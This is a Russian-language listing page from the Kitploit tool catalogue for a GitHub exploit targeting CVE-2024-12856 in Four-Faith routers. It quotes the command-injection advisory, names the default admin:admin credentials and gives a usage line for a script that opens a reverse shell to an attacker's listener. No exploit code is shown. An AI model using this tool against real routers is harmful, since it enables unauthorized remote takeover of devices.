Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-12856 — Эксплойт для маршрутизаторов Four-Faith для получения обратной оболочки | Kitploit
Инструменты/GitHubGitHub/nu113d/cve-2024-12856
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubnu113d/cve-2024-12856

CVE-2024-12856

Эксплойт для маршрутизаторов Four-Faith для получения обратной оболочки

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-12856

Это эксплойт для маршрутизаторов Four-Faith моделей F3x24 и F3x36, позволяющий получить reverse shell.

«Маршрутизаторы Four-Faith моделей F3x24 и F3x36 подвержены уязвимости внедрения команд операционной системы (OS). По крайней мере, версия прошивки 2.0 позволяет аутентифицированным и удалённым злоумышленникам выполнять произвольные команды ОС через HTTP при изменении системного времени через apply.cgi. Кроме того, эта версия прошивки имеет учётные данные по умолчанию, которые, если их не изменить, фактически превращают эту уязвимость в неаутентифицированное и удалённое выполнение команд ОС.»

Источник: nist.gov

Этот скрипт основан на полезной нагрузке, обнаруженной VulnCheck

Как использовать

Перед запуском эксплойта запустите TCP-сервер на вашей машине.
Затем выполните

python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT

Где

  • RHOST — удалённый IP-адрес. Также можно указать домен.
  • LHOST — IP-адрес вашего TCP-сервера на вашей машине.
  • LPORT — порт вашего TCP-сервера.
  • USERNAME и PASSWORD — учётные данные маршрутизатора. По умолчанию admin:admin.
  • RPORT — удалённый порт маршрутизатора. По умолчанию 80.
  • Отказ от ответственности

    Убедитесь, что используете этот эксплойт только для тестирования и в авторизованных средах.

    Никогда не используйте его в злонамеренных целях.

    Скачать инструмент